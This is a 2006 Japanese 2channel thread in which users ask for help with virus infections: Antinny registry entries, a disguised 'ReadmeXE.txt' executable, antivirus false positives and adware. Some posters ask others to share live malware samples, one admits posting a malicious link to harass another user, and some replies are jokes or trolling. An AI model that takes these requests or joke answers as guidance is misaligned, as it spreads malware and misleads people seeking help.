>>305 どうして人が傷つくようなことが平気で言えるのか?
本気で困っているんです
レジストリハイブも回復コンソールだってなんのソフトかわからないし
>>288 に便乗質問します
【使用OS】 WINNY
【WINDOWS UPDATE】 してます
【ウィルスソフト】 ErrorSafe
【UPDATE】 してます
【スキャン】 ―――
【症状】 ハードディスクが認識しない?
【やったこと】 Alt+F4押しつづけても画面が開き続けて閉じることができなくなって
【とった処置】 怖くなってあわててコンセント抜いてしまいました
>>307 そんな時にはファイル名を指定して実行に
「tskill iexplore」
惜しかったね もっと早く知っとけばよかったね
309 :
288 :2006/11/28(火) 22:49:25
このまま起動できないままだと大事なファイルが見れなくなります ダウンロードしたデジカメのファイルが見れなくなるのは一番困ります
>ダウンロードしたデジカメのファイル< ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (?д?)
他人がデジカメで撮ったやつを収集していたという感じかな…まぁ、そんなものはまた集めれば良い訳で…。
友達のPCにHDつけてもらって中身ぬきだせば?
∧_∧ ( ´∀`) まぁ CDブートとかですな ( ) 1CD LinuxとかBart PEとか | | | 知り合いに頼んだら USBメモリとかに吸い出せるかと (__)_) デバイス繋いでからブートしましょう
314 :
名無しさん@お腹いっぱい。 :2006/11/29(水) 00:06:55
【使用OS】 windows xp 【WINDOWS UPDATE】 最新 【ウィルスソフト】 ノートン 【UPDATE】 最新 【スキャン】 かけてる 【症状】 ギコネコが画面のなかをフワフワとうごきながら『迷い込んだようだ』という 【やったこと】 lanから切断 【とった処置】 再度スキャン中 ギコネコがふわふわ画面を動く ウイルスというのがあるのでしょうか? お教えいただけるとありがたいです これは別端末より 書き込みしてます
>>314 gifアニメならな
きっと何でもねえよ
>>315 アドバイスありがとうございます.
>>316 アドバイスありがとうございます。
314です。はじめてなので、パニクリました。
318 :
ギコ :2006/11/29(水) 01:13:19
Mac、Linux、UNIXのウィルス情報のスレありませんか?
320 :
名無しさん@お腹いっぱい。 :2006/11/29(水) 01:51:24
cookieの名前が変わるウイルスってありますか?
【使用OS】XP 【WINDOWS UPDATE】している 【ウィルスソフト】バスター 【UPDATE】している 【スキャン】バスター 【症状】Adware_PlanetNewsというのがでてくる。 【やったこと】とくになし 【とった処置】まだしていない バスターのデータベースででてこない。 ググるとマカフィーでは大丈夫とでてきます。 放置して大丈夫なのでしょうか?
322 :
名無しさん@お腹いっぱい。 :2006/11/29(水) 03:57:52
テンプレにのっとらない形の投稿で申し訳ございません
どなたか助けてください…
さきほどネット上で「Ghost Recon AW」というゲームのNo Diskパッチを探していたところ
海外のサイトでそれらしきモノがあったのでダウンロード&インストールしたのですが
どうやらそれがウィルスだったらしくそのまま感染してしまいました…
最初hitman pro2 やウィルスバスターのスパイウェアの検索&削除をおこなっていたのですが
どうにも駆除できませんでした。その間もウィルスはタスクバーに表示され活動中…
それまでの記憶をたどり検索してみた所
ttp://www.viruschaser.jp/vi_index/vi_w/Win32.HLLW.Tibic.html 上記のページにある「Win32.HLLW.Tibic」が入ってしまった可能性が浮上してきました。
これはあくまで憶測ですが、起動中sysmatrixのNet in & Net outにもわずかながらデータの送受信が確認できたので上記のページに記されているP2Pを利用してという部分にも合致しているかと思います。
そして、その後上記のページにあるvirus chaserのdemoをインストールし駆除を試みました。
しかしvirus chaserが検索を開始し、「ウィルスを発見しました。削除しますか」と表示された瞬間にPCが強制終了…。
その後再起動しても、スタートアップ画面からログオンし、最初のデスクトップ画面が表示されたところでそのまま停止。
別のユーザーでログオンしてもまったく同じ状態で停止…。
(一応画面上にアイコンは表示されます。が、タスクバーの常駐型ランチャー等を読み込んでいる途中で止まります)
実質、起動しても何もできない状態です…。
今現在この書き込みに関しては別のPCから行っています。
ちなみにPCの構成は下記の通りです
Windows XP 2
Athlon X2 4600
mem 3G
MB:K8N Neo4-FX
windows update &virus buster updateほぼ毎日チェック更新おこなっております
長々とすいませんでした。
どなたか解決方法に心当たりのある方がいらっしゃいましたらおしえてください。
よろしくお願いします。
∩___∩ | 丿 ヽ / ー ー | | ( _●_) ミ 彡、 ヽノ ,,/ / ┌─┐´ |´ 丶 ヽ{ . }ヽ r ヽ、__)ニ(_丿 ヽ、___ ヽ ヽ と____ノ_ノ
○ ⊂⊃ ⊂⊃ /~~\ ⊂⊃ 林林............,,,,傘傘傘::::::::傘傘傘.........林.林... zzzzzzzz........... _,,..,,,,_ 、, ,,, 、,, ./ ,' 3/⌒ヽ-、_ 、 ,, @ 、, /l. /____/ ヽ|ノ,, @ ,,, 、,,  ̄,, ̄ ̄ ̄ ̄,, ̄ ,,, 、,, ヽ|ノ 、、, ,, 、,, , " ,, 、、, ,,
∧∧ _。 (´・ω・`)_ /c(_ア旦 ̄ ̄/ヽ /______/※※ヽ、 ぬくぬくぬく 〆※ ※ ※// ∠二二二二二二二二二ゝ
>>321 >Adware_PlanetNews
これ正確?ぐぐってもまったく出てこないのだが・・・
>>322 これにこりてP2Pをやめるべし。
さっさとOSをクリーンインストールしてしまうことを推奨したい。
意地悪ではなく、それがあんたの為になると本気で思っているので。
328 :
321 :2006/11/29(水) 05:49:28
>>326 間違いないです。そのまま詳細調べようとしてみたんですが、
データベースでてこなかったんです。
一体なんなんだろう・・・
とりあえずspybotを入れてみます。
329 :
321 :2006/11/29(水) 05:51:44
追記 PlanenNewsというのはでるんですが・・・
>>321 >ググるとマカフィーでは大丈夫とでてきます。
そのマカフィーのページでいいから、そこのURLを貼り付けてみて。
【使用OS】 win2k 【WINDOWS UPDATE】自動更新にてやっています 【ウィルスソフト】バスター 【UPDATE】昨日夜に実施 【スキャン】いつやったか覚えてないです 【症状】 全ファイルがpugyaaa○○に 【やったこと】全パーテーションフォーマット 【とった処置】上記 質問ではなくやってしまった見たいなので報告 ところで何て言うウィルスか知ってる方おられましたら教えて下さい 後最近なりふり構わずwinnyでエロゲ収集してました では今度p2pはやめる事にして復旧してきます ノシ
pugyaaaウィルス
>>332 サンクス
今情報収集していましたが
もう一つのp2pソフト(名前失念)発祥のウィルス見たいですね
BISHOPの放課後2でもやったんだろ ホワイターが仕込んであるのはみんな知っているのに
335 :
名無しさん@お腹いっぱい。 :2006/11/29(水) 13:39:48
【使用OS】 win2k 【WINDOWS UPDATE】自動更新 【ウィルスソフト】avast、ad-aware 【UPDATE】毎日実施 【スキャン】 1.スタートアップ等のみの簡易スキャン:約1週間おきの再起動時に毎回 2.手動スキャン:昨日(前回の手動スキャンは3ヶ月ほど前) ※なお、このところ起動後の常駐スキャンは止めていました 【症状】 不明 【やったこと】avastにて手動スキャン時に発見・削除 【とった処置】上記 c:\winnt\$NtServicePackUninstallの中に"conime.exe"という ファイル名のトロイが見つかりました。 avastで表示された名称は"Win32 Patched-B[Trj]"です。 これはどんな悪さをするものなんでしょうか? avastのサイトで詳細を検索してもヒットしなかったので 気持ち悪いです。
336 :
321 :2006/11/29(水) 13:56:34
337 :
世界最強至高のアンチウイルスソフトそれがNOD32だ!! :2006/11/29(水) 14:28:26
>>336 結局Spybotでは検出されなかったの?
339 :
321 :2006/11/29(水) 15:08:21
spybotでは大丈夫と出たんですが・・・ ググってもでてこないものが突然出てきて驚いています。放置しても大丈夫なんでしょうか?
>>321 HKLM\Software\Microsoft\Internet Explorerの先も書き込めばこたえてくれる方がいるかもね。
VB2007のログの「アイテム名」と「タイプ」の間にマウスポインターを合わせ右にドラッグ
すると全体が見えると思う。
今の段階ではSearch Pageなどが書き変えられている可能性が…とか
341 :
321 :2006/11/29(水) 16:08:15
343 :
321 :2006/11/29(水) 16:28:44
345 :
321 :2006/11/29(水) 17:20:18
>>344 様
本当にありがとうございました。次回から放置で処置するのが最善なのでしょうか?
347 :
321 :2006/11/29(水) 18:26:26
>>346 本当に皆様ありがとうございました。感謝いたします。
349 :
335 :2006/11/29(水) 19:52:43
>348 ありがとうございます。 胃が痛くなっていたのですが少し安心しました。 しかし当該ファイルを即座に削除したために リンク先に書かれているファイルと同一のものだったのか 確認できないのが気がかりです。 多くのavast + win2kユーザが検出すると思われるのに この件があまり話題に上がってないのは何故なんだろう・・・?
【使用OS】 WINXP Home SP2 【WINDOWS UPDATE】 自動更新。現在最新 【ウィルスソフト】 Norton Internet Security2006、Pestpatrol 【UPDATE】 ウイルスソフトは最新にアップデート済み 【スキャン】 Nortonでスキャンしたがウイルスなしと表示。 【症状】 だがKISでスキャンするとトロイ2つ発見(名前は忘れました) 【やったこと】 【とった処置】 Kasperskyのオンラインスキャンでスキャン→(Nortonを無効にして)Kaspersky〜の体験版をインストール →スキャンし削除→アンインストール→(Nortonを有効化) ぁゃιぃ添付を開いたら、ウイルスに感染しますたorz再スキャンしても出て子なったのですが 再インストール以外でほかにとるべき措置はありますか?
353 :
350 :2006/11/29(水) 21:40:20
回答ありがとうございます。
>>351 2つのうち1つはTrojan-Dropper.Win32.Agent.aznです。もう1つは忘れましたorz
>>352 2007に無償アップグレードできるとは知りませんでしたのでアップデートして再スキャンしてみます。
【使用OS】 windows xp 【WINDOWS UPDATE】 最新 【ウィルスソフト】 ノートン 【UPDATE】 最新 【スキャン】 かけてる 【症状】 起動時にWMPが立ち上がりすぐに再起動、WMPを閉じればその後は動いてます 【やったこと】 何がなにやらわかりません 【とった処置】 とりあえず再度スキャン中 scrファイルを実行した途端にコマンドプロンプトが一瞬立ち上がり、再起動。 移行症状が回復しません。 どなたか対処法をご教授願います。
>>354 しっちゃかめっちゃかだな
NortonとWMPのバージョンくらい書け。
356 :
354 :2006/11/30(木) 00:15:19
>>355 さんすいません
ノートンは2006
WMPはver10です。
ちょっとパニクってました。
357 :
355 :2006/11/30(木) 00:18:45
358 :
354 :2006/11/30(木) 00:25:19
>>355 さんありがとうございます
向こうにも行って見ます
>>359 mp3ファイルを極窓で調べたら拡張子不明だし、
ファイルの再生方法.txt.scr
こんなファイルも付属されてるし
361 :
335 :2006/11/30(木) 12:05:21
解決です。 win2k proのCDをスキャンしたらオリジナルのconime.exeが トロイ扱いされて引っかかりました。 確かにavastの誤検出だったようです。 conime.exe 26,384 bytes 1999/12/08 10:55:06 MD5:0177C933D682EACC1118DD7097640F7B avastの 22.11.2006 - 0650-0 更新分の定義ファイルに追加された "Win32:Patched-B [Trj]"と上記のconime.exeのビットの並びが たまたま一致したんでしょうね。
362 :
名無し :2006/11/30(木) 14:19:25
誰かホワイターって持ってないかい? いろいろ探したけど見あたらないよ〜
364 :
名無しさん@お腹いっぱい。 :2006/11/30(木) 17:51:16
【使用OS】 windows xp 【WINDOWS UPDATE】 最新 【ウィルスソフト】 マカフィー 【UPDATE】 最新 【スキャン】 かけてる 【症状】 スキャン結果で『Dialer-182』レジストリ脅威が検出される、ちなみに駆除されない あとその実際に『Dialer-182』に何されているのか分からない(マカフィーのHPに載ってないから) 【やったこと】【とった処置】 再度スキャン 『Dialer-182』って何なんだ(-_-;) マカフィーのHPのウィルス検索にもひっかからんから対処方法がわからないよー
勝手に電話するやつ
367 :
名無しさん@お腹いっぱい。 :2006/11/30(木) 20:08:39
>>366 説明できないのに書き込むオナニー野郎乙!
>>368 ごめんなさい、わたし野郎じゃなくて女ですし、オナニー←必用ありません、彼がいますので。
あなたも、そんな虚しい書き込みはやめて早く彼女でも作ってくださいね。
【使用OS】 windowsXP 【WINDOWS UPDATE】 できなくなった 【ウィルスソフト】 ノートンが入っていたような・・・&hijackthis 【UPDATE】 たぶん 【スキャン】 hijackthisっていう解析ソフトで↓の奴が出てきた O4 - HKLM\..\Run: [ara-key] C:\Program Files\WindowsUpdate\wuaudnld.tmp\cabs\com_microsoft.Q831167_IE6_SP1\Q8311674967.exe -StartUp O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax 【症状】 起動すると「フォルダが壊れています」っていうようなメッセージがでてくる 【やったこと】 何もしていない・突然出てきた 【とった処置】 毎回起動時に出てくる上のメッセージを閉じてる
>>370 O4 - HKLM\..\Run: [ara-key]・・・っていうエントリーは百発百中antinny
っていうウイルスなんだけど、このウイルスってnyしてなければ
感染することなんて完全皆無だけどね。
お前、winnyしてるんじゃないんか?
>>370 悪いことは言わん 再インストールしなさい 中身がウイルスでボロボロだ
仮に駆除できたとしても、不調は直らないかもよ
373 :
370 :2006/11/30(木) 22:18:38
>>371 ↓はantinnyという名のウイルスなんですか?
O4 - HKLM\..\Run: [ara-key]
しかし変ですね、winnyなんて一度も使ったことは無いのですが。
どこから入ってきたんでしょう?
>>373 まあな、もうひとつ
O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax
↑
これもantinny。亜種だけどな。
もう一度聞くよ?
本当にwinnyしてないんだな。
376 :
370 :2006/11/30(木) 22:24:52
>>372 再インストールとはノートンのことでしょうか?
知識が乏しくてPC始めてから1ヶ月もたたない初心者ですので・・・
>>375 はいやってません。身に覚えもありません。
>>376 最近ソフトいれたり、誰かからファイル貰ったりしてない?
>>376 俺は執念深い男だからな。
最後の確認として、ファイルの検索っていうやつを使ってだ、winnyという名前の
フォルダ・ファイルが存在するか確認してもらえんか?
スタート→検索→フォルダやファイルの検索
↓
探す場所→c:\
↓
詳細→サブフォルダの検索にチェックを付ける
↓
名前→winny
↓
検索
379 :
370 :2006/11/30(木) 22:35:21
>>377 知らない人からソフトやファイルをもらう理由なんてありませんよ。
>>378 今してみますね。
380 :
370 :2006/11/30(木) 22:38:45
フォルダ・ファイルの検索でwinny2という名前のフォルダが見つかりました。
381 :
名無しさん@お腹いっぱい。 :2006/11/30(木) 22:44:05
おまwww普通にありえねーよwww あんまり釣れなかったねwww
はい、撤収撤収 本人かどうかはどうでもいい
>>380 nyしてなかったらwinnyって名前のフォルダは見つからんぞ?
384 :
370 :2006/11/30(木) 22:54:25
>>381 釣りとかじゃなくて本当に困っているんです!
386 :
370 :2006/11/30(木) 22:57:45
>>382 370です。信じてください(泣
>>383 winnyはやってません!
ハッカーです。
ハッカーが私のPCに侵入しwinnyを入れたのです。
悪い
388 :
名無しさん@お腹いっぱい。 :2006/11/30(木) 23:00:28
ごめん。スーパーハカーの俺がやったwww
>>386 俺を笑い殺す気かてめえ!?
始めて耳にしたぞ、侵入先のPCにnyをインストールするハッカーがいるって。
2ちゃんねる内でわけのわからないURLをコピペして貼りつけてしまいました 携帯からだったのでウイルスが本当にあるなどの確認などできませんでしたが そのURLを開いた方の話ではウイルスに感染したと言われています それで、その方から裁判にすると言われております、 これは犯罪になるのですか?また私はどのような処置を取ればいいでしょうか? インターネットには詳しくないのでご意見を頂きたくレスさせてもらいました 詳しい方教えていただけないでしょうか、よろしくお願いしますm(__)m
391 :
名無しさん@お腹いっぱい。 :2006/11/30(木) 23:05:12
>>390 逮捕きたーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
392 :
370 :2006/11/30(木) 23:05:56
間違いなくハッカーの仕業です。 自分は入れた覚えが無いのに、いつのまにか勝手に入っていた というのが、ハッカーの仕業と言う証拠です。
>>390 どこに貼ったの?ほんとにウイルスか確認してきてやるよ。
>>396 いま見てきてやるよ。それからどのスレに貼ったのさww
>>397 ちょっとスレまでは言いたくないのですが…
すみませんm(__)mちょっと嫌な話になっているのであまりみられたくないのです。
本当に困ってここにきました。
恋愛サロンの中の板に貼ってはありました。 私がみかけたのは二つです。
>>396 ウイルスは平気だったぞ。ただのブラクラだよ。
それから、訴えるってwwwほっとけ、大丈夫だから。でもあんまり変なURL貼るのはやめようねw
風俗王ボブってwww
>>400 ありがとうございましたm(__)m
確認なんですがウイルスはなかったのですか?
ちなみにブラクラってなんでしょうか?
その相手がいっていたウイルス名をちょっとコピペさせてもらいます
みていただけませんか?
ウイルス名:JS_NOCLOSE.AE ・侵入方法: この不正プログラムは、通常悪意のあるWebサイトに組み込まれており、 ユーザがアクセスした際に実行されます。 また、スパムメールに添付されてコンピュータへ侵入する場合もあります。 このウイルスに感染したと言われました。
それはそれは、この度はおめでとうございます
>>403 えっ?
私本当に困ってるんです、裁判するなんていわれてから
不安で不安で…(;_;)
ブラクラはぐぐってきました、だいたい内容はわかったような気はしますが… ウイルスが本当になかったんであれば安心できます。 本当にありがとうございましたm(__)m
406 :
名無しさん@お腹いっぱい。 :2006/12/01(金) 00:03:51
>>405 ウイルス仕込まれてたよ。ノートンではTrojan Horse検出したよ。
やばいかもね。
>>406 うわぁ…まじですか……?訴えられたらどうしよ……
実はちょっと嫌な奴がいて、リンク貼りつけてました… ちなみに相手にたいしてレスアンカーはつけてないんですが… 携帯からなんでウイルスがあることなんて想定できなかったんです、 まさか本当にあったなんて……orz
さっきから裁判とか訴えるとか意味が分からないんだけど
その相手はネット関係の仕事をしているとかなんとかで 損害賠償を請求するとか言われました… URL貼りつけて犯罪行為になることすら知らなかったので こんなことになってしまったんです。
>>409 じゃあ悪意があった訳だね・・・・・行為は誉められたものではないけど、訴訟云々は気にしなくても大丈夫だと思うよ。
これに懲りてもうしなければいいんじゃない。
>>411 ネット関係の技術者が安易にリンク踏んでファビョってるの???
頼むから該当スレ教えてくれ。
>>410 ウイルスに感染するリンクをわざと貼ったとかで、
犯罪だから警察に報告して裁判にすると言われてるんです。
私のやったことは犯罪じゃないんですか?
こんなんで警察動く訳ねーだろ
そのスレの住民のテンションがネタなのかマジなのか わからん
>>416 ネタかなー?って考えてたんですが
に、してはかなり引っ張ってるんで信じてしまうんですよ…
419 :
名無しさん@お腹いっぱい。 :2006/12/01(金) 00:41:06
>>415 ざっと読んできた(笑)大丈夫だからもう寝なよ。
君はなかなか素直な子なんだね。他のスレ覗いたことある?ウイルスなんていっぱいリンクされてるよ。
とにかく安心して大丈夫だよ^^
>>419 他のスレはあまりみたけとないんです…そんなに貼ってあるんですか!
それに、あそこまで言われたら信じてしまいました
すみませんでした、ご迷惑おかけしましたm(__)m
本当に本当にありがとうございました、もぅ悪戯はいたしません。
421 :
名無しさん@お腹いっぱい。 :2006/12/01(金) 17:08:30
【使用OS】 WINXP 【WINDOWS UPDATE】 自動更新 【ウィルスソフト】 マカフィーセキュリティセンター 【UPDATE】 してる 【スキャン】 3日前 【症状】 マカフィーのシールドが勝手に切れたりする あと タスクにnordsys.exe oasclnt.exe exe.exe wuauclt.exe などがあるんですけど これは消したほうがいいのでしょうか
【使用OS】windowsXP 【WINDOWS UPDATE】 最新 【ウィルスソフト】 avast, ノートン 【UPDATE】 してる 【スキャン】 かけてる 【症状】 再起動+fromJASRACがシステムに食い込み強制再起動 再起動後、WindowsMediaPlayerが起動し、しばらくしたらまた強制再起動 【やったこと】 ダウンロードしたファイル内にあった、「ReadmeXE.txt」をダブクリ。 感染したと気づいた後、プロパティを見ると、「Readmtxt.eXE」に変わっていた。 しかしフォルダ内では「ReadmeXE.txt」と表示されていた。 【とった処置】 トレンドマイクロオンラインでスキャン 現在はサブマシンでアクセス、復旧の目処がたたないためメインは放置
>>423 ReadmeXE.txtが気になる
テキストファイルにそんなことできるのか
>421 nordsys.exe oasclnt.exe exe.exe wuauclt.exe のうち、oasclnt.exeはマカフィーのだから 他のはどうかな…? とりあえずnordsys.exe oasclnt.exe exe.exe wuauclt.exeのファイルを検索して 見つけて、プロパティ開いて会社名とか見てマルウェアかどうか判断してみ?
これかなりやばいね いわれなきゃ おいらひっかかってる
431 :
名無しさん@お腹いっぱい。 :2006/12/01(金) 23:00:10
こりゃ全種類の拡張子をチェックしないといかんかな 画像や動画でやられると踏んじゃうね
432 :
名無しさん@お腹いっぱい。 :2006/12/02(土) 00:52:16
なんかタスクバーのところに赤い○に白い×のマークで、そこにポインタを合わせると your computer is infectedっていうのが出現して困ってます 誰か助けて〜
>>433 ありがとう解決したよ。ユーみたいなやさしい人がいるから2chはやめられない
436 :
名無しさん@お腹いっぱい。 :2006/12/02(土) 14:02:39
>>282 先ほど、AntiVirがC\Program Files\Lhaplus\Lhaplus.exeを「TR/Dldr.Stration.I」
として検出したのですが、誤検出だと考えてよろしいでしょうか?
おいら、とりあえず、Lhaplus.exeの削除、Lhaplusのアンインストールをしてみた。
けど、タスクマネージャーでexplorer.exeが、何もしてしてない時もいつも動いてます。
explorer.exe-02121B1A.pf、IEXPLORE.EXE-2D97EBE6.pf、とかつくられてます。
消してもまたできるので、レジストリが書き換えられてるのではと思いますが、
元に戻せますか?
さっきウィルスバスターオンラインで検索してみたら BKDR_HUPIGON.GEN BKDR_HUPIGON.AHP BKDR_GRAYBIRD.GR の3つが検出されたんだけど、ヤバイのかな? ウチなんもウィルス駆除ソフトいれてないっす。 アドバイスお願い申す
後、ウイルス反応のあった検出場所を
>>439 おk
【使用OS】windowsXP
【WINDOWS UPDATE】 2ヶ月前
【ウィルスソフト】 何もナシ
【UPDATE】 していない
【スキャン】 かけていない
【症状】 特に表れていない
検出されたのが
BKDR_HUPIGON.GEN
BKDR_HUPIGON.AHP
BKDR_GRAYBIRD.GR
場所はWINDOWSフォルダですがいじるの怖いんでなんもしてません
お願いします
>>442 ,443
レスありがとう
これってトロイだったのかorz
受験勉強するため接続今日で切るんだが、オフラインでも関係なく使われるんでしょか
>>443 いいえ ルーターとファイアーウォールがあるから心配ないです
ケーブル抜いてる間は外から操作されたり、新しく何か盗まれるこたないが… オフラインにしたって飼っといて気持ちのいいもんじゃあるまいに 再インストールできない理由でもあるのか? それからそのマシンでクレジットカードとか個人情報とか 入力した覚えがあるなら変えられるものは変更することを勧める 今時のマルウェアは金銭目的だから
447 :
名無しさん@お腹いっぱい。 :2006/12/02(土) 16:37:44
【使用OS】windowsXP 【WINDOWS UPDATE】 2ヶ月前 【ウィルスソフト】 はいってない 【UPDATE】 してる 【スキャン】 してない 【症状】 文字の入力モードが勝手に激しく変わる(ひらがな→直接入力→全角英数…) 【とった処置】 トレンドマイクロオンラインでスキャン、検出されず
ワラタw
【使用OS】Win2k sp4 【WINDOWS UPDATE】してる 【ウィルスソフト】ノートンアンチウィルス 【UPDATE】してる 【スキャン】フルスキャン済み 【症状】winnt\explorer.exeが61.152.92.99にアクセスしようとする。 【やったこと】調べてみると、imkill.98link.com|BT|Hijackers#BLMというキーワードが見つかるが、 国内のウィルスデータベースには特に記述が見当たらない。中華系? 【とった処置】スパイウェア駆除ソフトとノートン先生にお願いしたが、特に検出されず。 現在はファイヤーウォールでブロック中。 とりあえず、何がexplorer.exeを叩いているのかが知りたいんです。 心覚えのある人いますか?
>>450 imkill.98link.com
これでググルと・・・・
まったくもってウイルス初心者です。 【使用OS】WindowsXP 【WINDOWS UPDATE】してる 【ウィルスソフト】Avira AntiVir PersonalEdition Classic 【UPDATE】ついさっき 【スキャン】UPDATE後Cドライブ全スキャン 【症状】不明 【やったこと】Winnyなどやってましたが、その頃はウイルスバスター2006で反応なしでした。 【とった処置】隔離 C:\System Volume Information\_retore{051B990F-C89C-4A21-9197-F1FC8B708C1F}\RP345\A0051354.exe 検出したウイルス名:BDS/Delf.BF C:\System Volume Information\_retore{051B990F-C89C-4A21-9197-F1FC8B708C1F}\RP344\A0051329.exe 検出したウイルス名:Contains signature of the worm WORM/Antinny C:\Program Files\Ulead Systems\Ulead DVD MovieWriter 4\Instsys3ff3.exe 検出したウイルス名:Contains signature of the worm WORM/Antinny 削除でいいのでしょうか?AntiVirは誤検出も多いと聞いたもんで・・。
454 :
450 :2006/12/02(土) 19:41:01
>>451 「ランダムな文字列」にてこずりましたが、
該当ファイルとレジストリキーの削除に成功しました。
どもです。
ISOにもウィルス憑くらしいけど どうやって駆除するの? 不安でたまらない
不安を取り除くにはP2Pをやめるこったな
>>455 オートランを切ってウイルスチェックするだけだ
458 :
名無しさん@お腹いっぱい。 :2006/12/03(日) 21:37:29
【使用OS】WindowsXP 【WINDOWS UPDATE】してる 【ウィルスソフト】Avira AntiVir PersonalEdition Classic 【UPDATE】してる 【スキャン】Cドライブ全スキャン 【症状】IEXPLORE.EXE-2D97EBE6.pfが、C:\WINDOWS\Prefetch に作成される。 タクスマネージャー上に、IEXPLORE.EXEが4つ存在し、うち2つがメモリー30,880Kと28,432K。 【やったこと】 【とった処置】まだなにも。 IEXPLORE.EXE-2D97EBE6.pfをネットで調べて見たが、日本語のページが無く、?でした。 どうしたらいいでしょうか?
>>458 >IEXPLORE.EXE-2D97EBE6.pf
WinXPでアプリの起動を高速化するための機能。正常。
>IEXPLORE.EXEが4つ存在
たまに、IEのウィンドウを閉じても、終了できずにゾンビ化してる事がある。その都度、強制終了させてるが……。
たぶん、正常。
フルスクリーンのゲームをしてるとなぜか頻繁に落ちます。 その後、下のタスクが固まってしまい、強制終了しかなくなりってしまいます。 セキュリティソフトのせいっぽいと思うのですが。 【使用OS】WindowsXP 【WINDOWS UPDATE】してる 【ウィルスソフト】avast、sunbelt Kerio 【UPDATE】してる 原因分かる方、よろしくです。
>>460 相性の問題が絶対にない。
とは言い切れないが、「フルスクリーン」でのゲームはハードにかなりの負担をかけるから、
まずはそっちの検証の方が先決。
>>461 その辺は多分問題ないはずです。
CPU Athlon64 3700+(soket939)
メモリ 2G
グラボ GeForce7900GS
です。
ただ、電源が450Wなのでそれが少しあるかもですが・・・。
>>462 それならば、疑いが持てる要因、
・アンチウイルス
・プログラムのバグ
・メモリの不具合
・エアフロー
・使用頻度によるWindowsの劣化
・プログラム、ドライバー、デバイスなどのタイミングずれによるフリーズ
∩,,∩ (`・ω・) .c(,_uuノ
>>460 sunbelt Kerioを使っていて、いきなり落ちる事象を何度か食らったので使用をやめてみたら
ピタリと収まった経験があるけどな
返信遅れました。 とりあえずKerioから他のに変えてみるのからはじめてみます。 色々ありがとうございました。
さらに報告です。 思い切ってKerioアンインストールしてみました。 とあるところで必ず落ちていた現象がウソのようになくなりました。 やはりこれが原因だった様子。 代わりにX-GUARD入れてみました。 FWとしては正直心もとないですが、ルーターもつけてるし、落ちまくるよりはいいなかと思ってます。
468 :
465 :2006/12/04(月) 22:37:45
>>467 やっぱりKerioだったかぁ。良かったじゃない原因がわかってさ。
ちなみにおれもX-GUARD入れてる。
その理由は現在KIS6.0を使っているのだが以前うpデートでいきなり落ちてしまい
短時間とはいえFWがなくなってしまうのは怖いので最終防衛ラインの維持の為にいれた。
ルータなしなのでFWがなくなるのは危うすぎる(藁)
195 名前:名無しさん?[sage] 投稿日:2006/12/05(火) 19:52:18 ID:???
クラッキング(ハッキング)されました。。。
どうやら
7walker.com
7walker.net
どちらのサイト共にやられたようです。
階層内もずたずたにされており、
危険なファイルがまぎれている場合があるので、
サイト内にアクセスする場合は気をつけてください。
あとソースチェッカーオンラインですが、
誠に勝手ながら休憩させていただきます。
なお復帰時期は未定です。
\(^o^)/
【依頼は】鑑定人と雑談 Part81【だめぽ】
http://etc3.2ch.net/test/read.cgi/entrance/1163393226/l50
【使用OS】windowsXP 【WINDOWS UPDATE】 してる 【ウィルスソフト】 ウィルスバスター2006 【UPDATE】 してる 【スキャン】 してる 【症状】 再起動+再起動realplayer強制起動 【やったこと】 ダウンロードしたファイル内にあったReadmeXE.txtを実行 【とった処置】 トレンドマイクロオンラインでスキャンしても検出反応なし 最初に再起動された後は>423のように強制再起動はされません。 これは感染してるんですか?
471 :
名無しさん@お腹いっぱい。 :2006/12/06(水) 02:56:41
>>470 WINDOWSフォルダ内に「fromJASRAC.midi」が作成されていれば感染している
(「感染」という表現が正しいのか微妙だが)
とりあえず該当ファイルの削除、それと
レジストリエディタの
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
以下に該当のファイル名のエントリがあったらそれも削除
「fromJASRAC.midi」の再生で青画面再起動がかかるかどうかは環境依存なので
(midに関連付けられた再生アプリ、別途サウンドカード追加しているか等)
「感染」しても再起動ループにならない場合もある
後もしWinnyあたりに手を出しているのならさっさとやめれ
>>471 カスペはおろか現存するセキュリティソフトで対応しているものは無い
スキャンはするだけ無駄
「ReadmeXE.txt」はセキュリティベンダーの定義しているマルウェアの範疇から
微妙にずれているから、これからも対応するか微妙
と思ったらAntiVir対応してるのか
砂箱入れてりゃ無問題
感染元ファイルの実行前に入れていればそりゃそうだろうが…
>>473 対応したのか。
チェックした時、カスペすら検出できなかったんで、一応、トレンドには送っておいたけどね。
ReadmeXE.txt誰かうpして
>>476 対応していたのは
ファイルサイズ 83,456
MD5 745328f81fa7c8c4635df20bcff719e0
拡張子exe及びscrのやつ
ただ「fromJASRAC.midi」自体に対応しているのは、まだDrWebしか無い
青画面midは54〜55バイトくらいで手持ちで数種類あるが
いずれも対応してる模様
まあ本来はMSが対応すべき問題だし
>>479 俺が持ってるのと同じだな。(ReadmeXE.txt)
今チェックしてみたら、
AntiVirFound Trojan/Drop.MID.83456.A
Dr.WebFound Trojan.Crash
だった。
まぁ、俺の場合、登録されてる拡張子は表示しないになってるので、
Readmtxt アプリケーション
になるけどね。
そもそも二人ともどこからそんなもん手に入れたんだ・・・
初心者で申し訳ありません。 WINXP+SP2 フレッツのセキュリティ対策ツール=VB2006を使用してます。 先輩方のお知恵をお借りしたいのですが・・・ フリーソフトをDLし解凍→フォルダーアイコンがEXEになってたらしく、それをクリックで 「外部に接続しようとしてるプログラムがあります」の様な文言が出てきて慌ててしまい許可をクリックしてしまいました。 その時取ったログが下記です。 種類 時刻 プロトコル 送信元IPアドレス 送信元ポート 送信先IPアドレス 送信先ポート アプリケーションパス アプリケーション 名説明 例外設定0:51:04 TCP YOUR-********** 2787 222.146.51.139 25 C:\マイ ダウ .EXE ---マスメール送信 (SMTP) 上記な感じでマスメールを送信してしまったっぽいのですが・・・ マスメールとは何なのか・・・送信してしまったメールの内容がなんだったのか・・・ 気になってしまい眠れません。 どなたか御教授お願いします。
だからなんでそのフリーソフトの名前を書かないんだよ 書けない理由でもあんのかよ
486 :
名無しさん@お腹いっぱい。 :2006/12/06(水) 08:16:40
